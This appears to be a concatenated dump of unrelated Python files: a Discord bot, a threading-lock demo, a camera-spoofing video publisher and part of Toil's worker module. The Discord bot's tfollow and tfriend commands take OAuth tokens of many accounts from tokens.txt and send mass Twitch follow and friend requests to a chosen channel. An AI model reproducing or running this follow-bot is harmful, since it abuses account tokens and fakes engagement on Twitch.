embed = discord.Embed(color=16083729, description=f'<@{member.id}> has joined!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await channel.send(embed=embed)
@bot.event
async def on_member_remove(member):
guild = member.guild
if database[f'{guild.id}'][f'{member.id}']['inviter'] is not None:
inviter = str(database[f'{guild.id}'][f'{member.id}']['inviter'])
database[f'{guild.id}'][inviter]['invites'] -= 1
await update_database()
await update_invites(guild)
channel = await bot.fetch_channel(bots_channel)
if database[f'{guild.id}'][f'{member.id}']['inviter'] is not None:
invites = database[f'{guild.id}'][inviter]['invites']
_50 = discord.utils.get(guild.roles, name='+50')
_inviter = await guild.fetch_member(int(inviter))
if invites < 3 and _50 in _inviter.roles:
await _inviter.remove_roles(_50)
embed = discord.Embed(color=16083729, description=f'<@{member.id}> has left! Invited by <@{inviter}> ({invites} invite' + ('s)' if invites != 1 else ')'))
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await channel.send(embed=embed)
else:
embed = discord.Embed(color=16083729, description=f'<@{member.id}> has left!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await channel.send(embed=embed)
@bot.event
async def on_message(message):
if f'{message.author.id}' not in database[f'{message.guild.id}'].keys():
database[f'{message.guild.id}'][f'{message.author.id}'] = {'invites': 0, 'inviter': None}
await update_database()
await bot.process_commands(message)
class tfollow_bot:
def __init__(self, channel_id, amount):
self.channel_id = str(channel_id)
self.amount = int(amount)
self.tokens = []
self.load_tokens()
random.shuffle(self.tokens)
def load_tokens(self):
self.tokens = open('tokens.txt', 'r').read().splitlines()
def bot(self, i):
try:
_, _, token = self.tokens[i].split(':')
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'
origin = 'https://www.twitch.tv'
content_type = 'text/plain;charset=UTF-8'
client_id = 'kimne78kx3ncx6brgo4mv6wki5h1ko'
authorization = f'OAuth {token}'
accept_language = 'en-US'
data = '[{"operationName":"FollowButton_FollowUser","variables":{"input":{"disableNotifications":false,"targetID":"%s"}},"extensions":{"persistedQuery":{"version":1,"sha256Hash":"3efee1acda90efdff9fef6e6b4a29213be3ee490781c5b54469717b6131ffdfe"}}}]' % self.channel_id
content_length = len(data)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(('gql.twitch.tv', 443))
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
s.sendall(f'POST /gql HTTP/1.1\r\nHost: gql.twitch.tv\r\nAuthorization: {authorization}\r\nUser-Agent: {user_agent}\r\nOrigin: {origin}\r\nContent-Type: {content_type}\r\nClient-Id: {client_id}\r\nAccept-Language: {accept_language}\r\nContent-Length: {content_length}\r\n\r\n{data}\r\n'.encode('utf-8'))
s.recv(4096)
except:
pass
def start(self):
for i in range(self.amount):
while True:
if threading.active_count() < threads:
threading.Thread(target=self.bot, args=(i,)).start()
break
while True:
if threading.active_count() == 4:
break
return
class tfriend_bot:
def __init__(self, channel_id, amount):
self.channel_id = str(channel_id)
self.amount = int(amount)
self.tokens = []
self.load_tokens()
random.shuffle(self.tokens)
def load_tokens(self):
self.tokens = open('tokens.txt', 'r').read().splitlines()
def bot(self, i):
try:
_, _, token = self.tokens[i].split(':')
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'
origin = 'https://www.twitch.tv'
content_type = 'text/plain;charset=UTF-8'
client_id = 'kimne78kx3ncx6brgo4mv6wki5h1ko'
authorization = f'OAuth {token}'
accept_language = 'en-US'
data = '[{"operationName":"FriendButton_CreateFriendRequest","variables":{"input":{"targetID":"%s"}},"extensions":{"persistedQuery":{"version":1,"sha256Hash":"380d8b19fcffef2fd8654e524444055dbca557d71968044115849d569d24129a"}}}]' % self.channel_id
content_length = len(data)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(('gql.twitch.tv', 443))
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
s.sendall(f'POST /gql HTTP/1.1\r\nHost: gql.twitch.tv\r\nAuthorization: {authorization}\r\nUser-Agent: {user_agent}\r\nOrigin: {origin}\r\nContent-Type: {content_type}\r\nClient-Id: {client_id}\r\nAccept-Language: {accept_language}\r\nContent-Length: {content_length}\r\n\r\n{data}\r\n'.encode('utf-8'))
_ = s.recv(4096).decode('utf-8')
resp = s.recv(4096).decode('utf-8')
if 'service error' in resp:
self.bot(i)
except:
pass
def start(self):
for i in range(self.amount):
while True:
if threading.active_count() < threads:
threading.Thread(target=self.bot, args=(i,)).start()
break
while True:
if threading.active_count() == 4:
break
return
def zoom():
while True:
try:
task = queue.pop(0).split('|')
if task[0] == 'tfollow':
tfollow_bot(task[1], task[2]).start()
elif task[0] == 'tfriend':
tfriend_bot(task[1], task[2]).start()
except:
pass
threading.Thread(target=zoom).start()
async def status():
while True:
try:
members = sum([len([member for member in guild.members if not member.bot]) for guild in bot.guilds])
activity = discord.Activity(type=discord.ActivityType.watching, name=f'{members} members!')
await bot.change_presence(activity=activity)
await asyncio.sleep(300)
except:
pass
@bot.event
async def on_ready():
bot.loop.create_task(status())
try:
with open('database.json', 'r') as f:
global database
database = json.load(f)
except:
open('database.json', 'a')
for guild in bot.guilds:
await update_invites(guild)
if f'{guild.id}' not in database.keys():
database[f'{guild.id}'] = {}
await update_database()
@bot.event
async def on_command_error(ctx, error: Exception):
if isinstance(error, commands.CommandNotFound):
await ctx.message.delete()
elif isinstance(error, commands.MissingRequiredArgument):
ctx.command.reset_cooldown(ctx)
embed = discord.Embed(color=16083729, description='You are missing arguments required to run this command!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
if ctx.channel.id == bots_channel: await ctx.send(embed=embed)
elif isinstance(error, commands.CommandOnCooldown):
embed = discord.Embed(color=16083729, description=f'{error}')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
if ctx.channel.id == bots_channel: await ctx.send(embed=embed)
else:
await ctx.message.delete()
@bot.command()
async def help(ctx):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}help')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrator_ids:
embed = discord.Embed(color=16083729)
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
embed.add_field(name='Help', value=f'`{bot.command_prefix}help`', inline=True)
embed.add_field(name='Ticket', value=f'`{bot.command_prefix}ticket`', inline=True)
embed.add_field(name='Close', value=f'`{bot.command_prefix}close`', inline=True)
admin_roles = [role for role in ctx.author.roles if role.id in administrator_roles]
if admin_roles or ctx.author.id in administrator_ids:
embed.add_field(name='Clear', value=f'`{bot.command_prefix}clear`', inline=True)
embed.add_field(name='Update Database', value=f'`{bot.command_prefix}updatedb`', inline=True)
embed.add_field(name='Twitch Info', value=f'`{bot.command_prefix}tinfo (channel)`', inline=True)
embed.add_field(name='Twitch Followers', value=f'`{bot.command_prefix}tfollow (channel)`', inline=True)
embed.add_field(name='Twitch Friend Requests', value=f'`{bot.command_prefix}tfriend (channel)`', inline=True)
embed.add_field(name='Roblox Info', value=f'`{bot.command_prefix}rinfo (user)`', inline=True)
embed.add_field(name='Roblox Templates', value=f'`{bot.command_prefix}rget (asset)`', inline=True)
await ctx.send(embed=embed)
else:
await ctx.message.delete()
@bot.command()
async def ticket(ctx):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}ticket')
if ctx.channel.type != discord.ChannelType.private:
channels = [str(channel) for channel in bot.get_all_channels()]
if f'ticket-{ctx.author.id}' in channels:
await ctx.message.delete()
else:
ticket_channel = await ctx.guild.create_text_channel(f'ticket-{ctx.author.id}')
await ticket_channel.set_permissions(ctx.guild.default_role, send_messages=False, read_messages=False)
await ticket_channel.set_permissions(ctx.author, send_messages=True, read_messages=True, add_reactions=True, embed_links=True, attach_files=True, read_message_history=True, external_emojis=True)
embed = discord.Embed(color=16083729, description=f'Please enter the reason for this ticket, type `{bot.command_prefix}close` if you want to close this ticket.')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ticket_channel.send(f'{ctx.author.mention}', embed=embed)
await ctx.message.delete()
@bot.command()
async def close(ctx):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}close')
if ctx.channel.type != discord.ChannelType.private:
admin_roles = [role for role in ctx.author.roles if role.id in administrator_roles]
if ctx.channel.name == f'ticket-{ctx.author.id}':
await ctx.channel.delete()
elif admin_roles and 'ticket' in ctx.channel.name or ctx.author.id in administrator_ids and 'ticket' in ctx.channel.name:
await ctx.channel.delete()
else:
await ctx.message.delete()
@bot.command()
async def clear(ctx):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}clear')
if ctx.channel.type != discord.ChannelType.private:
admin_roles = [role for role in ctx.author.roles if role.id in administrator_roles]
if admin_roles or ctx.author.id in administrator_ids:
await ctx.channel.purge(limit=None)
await ctx.send(':zap:')
else:
await ctx.message.delete()
@bot.command()
async def updatedb(ctx):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}updatedb')
if ctx.channel.type != discord.ChannelType.private:
admin_roles = [role for role in ctx.author.roles if role.id in administrator_roles]
if admin_roles or ctx.author.id in administrator_ids:
counter = 0
members = [member for member in ctx.guild.members if not member.bot]
for member in members:
if f'{member.id}' not in database[f'{ctx.guild.id}'].keys():
database[f'{ctx.guild.id}'][f'{member.id}'] = {'invites': 0, 'inviter': None}
await update_database()
counter += 1
embed = discord.Embed(color=16083729, description=(f'`{counter}` users added to database!' if counter != 1 else f'`{counter}` user added to database!'))
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
else:
await ctx.message.delete()
@bot.command()
async def tinfo(ctx, channel):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}tinfo {channel}')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrator_ids:
try:
async with aiohttp.ClientSession() as session:
try:
channel_lower = channel.lower()
headers = {
'Client-Id': 'abe7gtyxbr7wfcdftwyi9i5kej3jnq',
'Accept': 'application/vnd.twitchtv.v5+json'
}
async with session.get(f'https://api.twitch.tv/kraken/users?login={channel_lower}', headers=headers) as r:
r = await r.json()
channel_id = r['users'][0]['_id']
async with session.get(f'https://api.twitch.tv/kraken/channels/{channel_id}', headers=headers) as r:
r = await r.json()
name = r['display_name']
followers = r['followers']
views = r['views']
logo = r['logo']
except:
embed = discord.Embed(color=16083729, description=f'Invalid twitch channel!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
return
embed = discord.Embed(color=16083729)
embed.set_thumbnail(url=f'{logo}')
embed.add_field(name='Name', value=f'`{name}`', inline=True)
embed.add_field(name='Channel ID', value=f'`{channel_id}`', inline=True)
embed.add_field(name='Followers', value=f'`{followers}`', inline=True)
embed.add_field(name='Channel Views', value=f'`{views}`', inline=True)
await ctx.send(embed=embed)
except:
embed = discord.Embed(color=16083729, description='An error has occured while attempting to run this command!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
else:
await ctx.message.delete()
@bot.command()
@commands.cooldown(1, 300, type=commands.BucketType.user)
async def tfollow(ctx, channel, amount: int=None):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}tfollow {channel}' + (f' {amount}' if amount else ''))
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrator_ids:
try:
max_amount = 0
member_roles = [role.id for role in ctx.author.roles]
for role in member_roles:
if f'{role}' in roles.keys():
max_amount += int(roles[f'{role}'])
member = ctx.guild.get_member(ctx.author.id)
for status in member.activities:
if isinstance(status, discord.CustomActivity):
if status.name == 'zoom':
max_amount += 25
break
admin_roles = [role for role in ctx.author.roles if role.id in administrator_roles]
if admin_roles or ctx.author.id in administrator_ids:
tfollow.reset_cooldown(ctx)
max_amount = len(open('tokens.txt', 'r').read().splitlines())
if not amount:
amount = max_amount
elif amount > max_amount:
amount = max_amount
async with aiohttp.ClientSession() as session:
try:
channel_lower = channel.lower()
headers = {
'Client-Id': 'abe7gtyxbr7wfcdftwyi9i5kej3jnq',
'Accept': 'application/vnd.twitchtv.v5+json'
}
async with session.get(f'https://api.twitch.tv/kraken/users?login={channel_lower}', headers=headers) as r:
r = await r.json()
channel_id = r['users'][0]['_id']
except:
tfollow.reset_cooldown(ctx)
embed = discord.Embed(color=16083729, description=f'Invalid twitch channel!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
return
position = len(queue) + 1
embed = discord.Embed(color=16083729, description=f'Sending `{amount}` twitch followers to `{channel}`! (`{position}/{position}`)')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
queue.append(f'tfollow|{channel_id}|{amount}')
except:
tfollow.reset_cooldown(ctx)
embed = discord.Embed(color=16083729, description='An error has occured while attempting to run this command!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
else:
tfollow.reset_cooldown(ctx)
await ctx.message.delete()
@bot.command()
@commands.cooldown(1, 300, type=commands.BucketType.user)
async def tfriend(ctx, channel, amount: int=None):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}tfriend {channel}' + (f' {amount}' if amount else ''))
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrator_ids:
try:
max_amount = 0
member_roles = [role.id for role in ctx.author.roles]
for role in member_roles:
if f'{role}' in roles.keys():
max_amount += int(roles[f'{role}'])
member = ctx.guild.get_member(ctx.author.id)
for status in member.activities:
if isinstance(status, discord.CustomActivity):
if status.name == 'zoom':
max_amount += 25
break
admin_roles = [role for role in ctx.author.roles if role.id in administrator_roles]
if admin_roles or ctx.author.id in administrator_ids:
tfriend.reset_cooldown(ctx)
max_amount = len(open('tokens.txt', 'r').read().splitlines())
if not amount:
amount = max_amount
elif amount > max_amount:
amount = max_amount
async with aiohttp.ClientSession() as session:
try:
channel_lower = channel.lower()
headers = {
'Client-Id': 'abe7gtyxbr7wfcdftwyi9i5kej3jnq',
'Accept': 'application/vnd.twitchtv.v5+json'
}
async with session.get(f'https://api.twitch.tv/kraken/users?login={channel_lower}', headers=headers) as r:
r = await r.json()
channel_id = r['users'][0]['_id']
except:
tfriend.reset_cooldown(ctx)
embed = discord.Embed(color=16083729, description=f'Invalid twitch channel!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
return
position = len(queue) + 1
embed = discord.Embed(color=16083729, description=f'Sending `{amount}` twitch friend requests to `{channel}`! (`{position}/{position}`)')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
queue.append(f'tfriend|{channel_id}|{amount}')
except:
tfriend.reset_cooldown(ctx)
embed = discord.Embed(color=16083729, description='An error has occured while attempting to run this command!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
else:
tfriend.reset_cooldown(ctx)
await ctx.message.delete()
@bot.command()
async def rinfo(ctx, *, user):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}rinfo {user}')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrator_ids:
try:
async with aiohttp.ClientSession() as session:
try:
try:
user = int(user)
except:
async with session.get(f'http://api.roblox.com/users/get-by-username?username={user}') as r:
r = await r.json()
user = r['Id']
async with session.get(f'https://api.roblox.com/users/{user}') as r:
r = await r.json()
name = r['Username']
async with session.get(f'https://friends.roblox.com/v1/users/{user}/followers/count') as r:
r = await r.json()
followers = r['count']
async with session.get(f'https://thumbnails.roblox.com/v1/users/avatar-headshot?format=Png&isCircular=false&size=420x420&userIds={user}') as r:
r = await r.json()
img = r['data'][0]['imageUrl']
except:
embed = discord.Embed(color=16083729, description=f'Invalid roblox user!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
return
embed = discord.Embed(color=16083729)
embed.set_thumbnail(url=f'{img}')
embed.add_field(name='Username', value=f'`{name}`', inline=True)
embed.add_field(name='User ID', value=f'`{user}`', inline=True)
embed.add_field(name='Followers', value=f'`{followers}`', inline=True)
await ctx.send(embed=embed)
except:
embed = discord.Embed(color=16083729, description='An error has occured while attempting to run this command!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
else:
await ctx.message.delete()
@bot.command()
async def rget(ctx, asset):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}rget {asset}')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrator_ids:
try:
async with aiohttp.ClientSession() as session:
try:
async with session.get(f'https://assetdelivery.roblox.com/v1/asset?id={asset}') as r:
r = await r.text()
async with session.get(f'https://assetdelivery.roblox.com/v1/asset?id=' + re.search('id=(.*)</url>', r).group(1)) as r:
r = await r.read()
with open(f'{asset}.png', 'wb') as f:
f.write(r)
embed = discord.Embed(color=16083729)
file = discord.File(f'{asset}.png')
embed.set_image(url=f'attachment://{asset}.png')
await ctx.send(embed=embed, file=file)
except:
embed = discord.Embed(color=16083729, description=f'Invalid roblox asset!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
return
finally:
try:
os.remove(f'{asset}.png')
except:
pass
except:
embed = discord.Embed(color=16083729, description='An error has occured while attempting to run this command!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
else:
await ctx.message.delete()
keep_alive.keep_alive()
bot.run(token)
|
thread2.py
|
import time,threading
#多线程锁定执行完一个方法才能被打断
lock = threading.Lock()
balance = 0
def change_it(n):
global balance
balance = balance+n
balance = balance-n
def run_thread(n):
for i in range(100000):
lock.acquire()
try:
change_it(n)
finally:
lock.release()
t1 = threading.Thread(target=run_thread,args=(5,))
t2 = threading.Thread(target=run_thread,args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print(balance)
|
cameraspooferprocess.py
|
# Copyright (c) 2019, Bosch Engineering Center Cluj and BFMC organizers
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import cv2
import glob
import time
from threading import Thread
from src.utils.templates.workerprocess import WorkerProcess
class CameraSpooferProcess(WorkerProcess):
#================================ INIT ===============================================
def __init__(self, inPs,outPs, videoDir, ext = '.h264'):
"""Processed used for spoofing a camera/ publishing a video stream from a folder
with videos
Parameters
----------
inPs : list(Pipe)
outPs : list(Pipe)
list of output pipes(order does not matter)
videoDir : [str]
path to a dir with videos
ext : str, optional
the extension of the file, by default '.h264'
"""
super(CameraSpooferProcess,self).__init__(inPs,outPs)
# params
self.videoSize = (640,480)
self.videoDir = videoDir
self.videos = self.open_files(self.videoDir, ext = ext)
# ===================================== INIT VIDEOS ==================================
def open_files(self, inputDir, ext):
"""Open all files with the given path and extension
Parameters
----------
inputDir : string
the input directory absolute path
ext : string
the extention of the files
Returns
-------
list
A list of the files in the folder with the specified file extension.
"""
files = glob.glob(inputDir + '/*' + ext)
return files
# ===================================== INIT THREADS =================================
def _init_threads(self):
"""Initialize the thread of the process.
"""
thPlay = Thread(name='VideoPlayerThread',target= self.play_video, args=(self.videos, ))
self.threads.append(thPlay)
# ===================================== PLAY VIDEO ===================================
def play_video(self, videos):
"""Iterate through each video in the folder, open a cap and publish the frames.
Parameters
----------
videos : list(string)
The list of files with the videos.
"""
while True:
for video in videos:
cap = cv2.VideoCapture(video)
while True:
ret, frame = cap.read()
stamp = time.time()
if ret:
frame = cv2.resize(frame, self.videoSize)
for p in self.outPs:
p.send([[stamp], frame])
else:
break
cap.release()
|
worker.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import map
from builtins import filter
import os
import sys
import copy
import random
import json
import tempfile
import traceback
import time
import socket
import logging
import shutil
from threading import Thread
try:
import cPickle as pickle
except ImportError:
import pickle
from toil.lib.expando import MagicExpando
from toil.common import Toil, safeUnpickleFromStream
from toil.fileStore import FileStore
from toil import logProcessContext
from toil.job import Job
from toil.lib.bioio import setLogLevel
from toil.lib.bioio import getTotalCpuTime
from toil.lib.bioio import getTotalCpuTimeAndMemoryUsage
import signal
logger = logging.getLogger(__name__)
def nextChainableJobGraph(jobGraph, jobStore):
"""Returns the next chainable jobGraph after this jobGraph if one
exists, or None if the chain must terminate.
"""
#If no more jobs to run or services not finished, quit
if len(jobGraph.stack) == 0 or len(jobGraph.services) > 0 or jobGraph.checkpoint != None:
logger.debug("Stopping running chain of jobs: length of stack: %s, services: %s, checkpoint: %s",
len(jobGraph.stack), len(jobGraph.services), jobGraph.checkpoint != None)
return None
#Get the next set of jobs to run
jobs = jobGraph.stack[-1]
assert len(jobs) > 0
#If there are 2 or more jobs to run in parallel we quit
if len(jobs) >= 2:
logger.debug("No more jobs can run in series by this worker,"
" it's got %i children", len(jobs)-1)
return None
#We check the requirements of the jobGraph to see if we can run it
#within the current worker
successorJobNode = jobs[0]
if successorJobNode.memory > jobGraph.memory:
logger.debug("We need more memory for the next job, so finishing")
return None
if successorJobNode.cores > jobGraph.cores:
logger.debug("We need more cores for the next job, so finishing")
return None
if successorJobNode.disk > jobGraph.disk:
logger.debug("We need more disk for the next job, so finishing")
return None
if successorJobNode.preemptable != jobGraph.preemptable:
logger.debug("Preemptability is different for the next job, returning to the leader")
return None
if successorJobNode.predecessorNumber > 1:
logger.debug("The jobGraph has multiple predecessors, we must return to the leader.")
return None
# Load the successor jobGraph
successorJobGraph = jobStore.load(successorJobNode.jobStoreID)
# Somewhat ugly, but check if job is a checkpoint job and quit if
# so
if successorJobGraph.command.startswith( "_toil " ):
#Load the job
successorJob = Job._loadJob(successorJobGraph.command, jobStore)
# Check it is not a checkpoint
if successorJob.checkpoint:
logger.debug("Next job is checkpoint, so finishing")
return None
# Made it through! This job is chainable.
return successorJobGraph
def workerScript(jobStore, config, jobName, jobStoreID, redirectOutputToLogFile=True):
"""
Worker process script, runs a job.
:param str jobName: The "job name" (a user friendly name) of the job to be run
:param str jobStoreLocator: Specifies the job store to use
:param str jobStoreID: The job store ID of the job to be run
:param bool redirectOutputToLogFile: Redirect standard out and standard error to a log file
"""
logging.basicConfig()
##########################################
#Create the worker killer, if requested
##########################################
logFileByteReportLimit = config.maxLogFileSize
if config.badWorker > 0 and random.random() < config.badWorker:
def badWorker():
#This will randomly kill the worker process at a random time
time.sleep(config.badWorkerFailInterval * random.random())
os.kill(os.getpid(), signal.SIGKILL) #signal.SIGINT)
#TODO: FIX OCCASIONAL DEADLOCK WITH SIGINT (tested on single machine)
t = Thread(target=badWorker)
# Ideally this would be a daemon thread but that causes an intermittent (but benign)
# exception similar to the one described here:
# http://stackoverflow.com/questions/20596918/python-exception-in-thread-thread-1-most-likely-raised-during-interpreter-shutd
# Our exception is:
# Exception in thread Thread-1 (most likely raised during interpreter shutdown):
# <type 'exceptions.AttributeError'>: 'NoneType' object has no attribute 'kill'
# This attribute error is caused by the call os.kill() and apparently unavoidable with a
# daemon
t.start()
##########################################
#Load the environment for the jobGraph
##########################################
#First load the environment for the jobGraph.
with jobStore.readSharedFileStream("environment.pickle") as fileHandle:
environment = safeUnpickleFromStream(fileHandle)
for i in environment:
if i not in ("TMPDIR", "TMP", "HOSTNAME", "HOSTTYPE"):
os.environ[i] = environment[i]
# sys.path is used by __import__ to find modules
if "PYTHONPATH" in environment:
for e in environment["PYTHONPATH"].split(':'):
if e != '':
sys.path.append(e)
setLogLevel(config.logLevel)
toilWorkflowDir = Toil.getWorkflowDir(config.workflowID, config.workDir)
##########################################
#Setup the temporary directories.
##########################################
# Dir to put all this worker's temp files in.
localWorkerTempDir = tempfile.mkdtemp(dir=toilWorkflowDir)
os.chmod(localWorkerTempDir, 0o755)
##########################################
#Setup the logging
##########################################
#This is mildly tricky because we don't just want to
#redirect stdout and stderr for this Python process; we want to redirect it
#for this process and all children. Consequently, we can't just replace
#sys.stdout and sys.stderr; we need to mess with the underlying OS-level
#file descriptors. See <http://stackoverflow.com/a/11632982/402891>
#When we start, standard input is file descriptor 0, standard output is
#file descriptor 1, and standard error is file descriptor 2.
#What file do we want to point FDs 1 and 2 to?
tempWorkerLogPath = os.path.join(localWorkerTempDir, "worker_log.txt")
if redirectOutputToLogFile:
# Save the original stdout and stderr (by opening new file descriptors
# to the same files)
origStdOut = os.dup(1)
origStdErr = os.dup(2)
# Open the file to send stdout/stderr to.
logFh = os.open(tempWorkerLogPath, os.O_WRONLY | os.O_CREAT | os.O_APPEND)
# Replace standard output with a descriptor for the log file
os.dup2(logFh, 1)
# Replace standard error with a descriptor for the log file
os.dup2(logFh, 2)
# Since we only opened the file once, all the descriptors duped from
# the original will share offset information, and won't clobber each
# others' writes. See <http://stackoverflow.com/a/5284108/402891>. This
# shouldn't matter, since O_APPEND seeks to the end of the file before
# every write, but maybe there's something odd going on...
# Close the descriptor we used to open the file
os.close(logFh)
debugging = logging.getLogger().isEnabledFor(logging.DEBUG)
##########################################
#Worker log file trapped from here on in
##########################################
workerFailed = False
statsDict = MagicExpando()
statsDict.jobs = []
statsDict.workers.logsToMaster = []
blockFn = lambda : True
listOfJobs = [jobName]
try:
#Put a message at the top of the log, just to make sure it's working.
logger.info("---TOIL WORKER OUTPUT LOG---")
sys.stdout.flush()
logProcessContext(config)
##########################################
#Load the jobGraph
##########################################
jobGraph = jobStore.load(jobStoreID)
listOfJobs[0] = str(jobGraph)
logger.debug("Parsed job wrapper")
##########################################
#Cleanup from any earlier invocation of the jobGraph
##########################################
if jobGraph.command == None:
logger.debug("Wrapper has no user job to run.")
# Cleanup jobs already finished
f = lambda jobs : [z for z in [[y for y in x if jobStore.exists(y.jobStoreID)] for x in jobs] if len(z) > 0]
jobGraph.stack = f(jobGraph.stack)
jobGraph.services = f(jobGraph.services)
logger.debug("Cleaned up any references to completed successor jobs")
#This cleans the old log file which may
#have been left if the job is being retried after a job failure.
oldLogFile = jobGraph.logJobStoreFileID
if oldLogFile != None:
jobGraph.logJobStoreFileID = None
jobStore.update(jobGraph) #Update first, before deleting any files
jobStore.deleteFile(oldLogFile)
##########################################
# If a checkpoint exists, restart from the checkpoint
##########################################
# The job is a checkpoint, and is being restarted after previously completing
if jobGraph.checkpoint != None:
logger.debug("Job is a checkpoint")
# If the checkpoint still has extant jobs in its
# (flattened) stack and services, its subtree didn't
# complete properly. We handle the restart of the
# checkpoint here, removing its previous subtree.
if len([i for l in jobGraph.stack for i in l]) > 0 or len(jobGraph.services) > 0:
logger.debug("Checkpoint has failed.")
# Reduce the retry count
assert jobGraph.remainingRetryCount >= 0
jobGraph.remainingRetryCount = max(0, jobGraph.remainingRetryCount - 1)
jobGraph.restartCheckpoint(jobStore)
# Otherwise, the job and successors are done, and we can cleanup stuff we couldn't clean
# because of the job being a checkpoint
else:
logger.debug("The checkpoint jobs seems to have completed okay, removing any checkpoint files to delete.")
#Delete any remnant files
list(map(jobStore.deleteFile, list(filter(jobStore.fileExists, jobGraph.checkpointFilesToDelete))))
##########################################
#Setup the stats, if requested
##########################################
if config.stats:
startClock = getTotalCpuTime()
startTime = time.time()
while True:
##########################################
#Run the jobGraph, if there is one
##########################################
if jobGraph.command is not None:
assert jobGraph.command.startswith( "_toil " )
logger.debug("Got a command to run: %s" % jobGraph.command)
#Load the job
job = Job._loadJob(jobGraph.command, jobStore)
# If it is a checkpoint job, save the command
if job.checkpoint:
jobGraph.checkpoint = jobGraph.command
# Create a fileStore object for the job
fileStore = FileStore.createFileStore(jobStore, jobGraph, localWorkerTempDir, blockFn,
caching=not config.disableCaching)
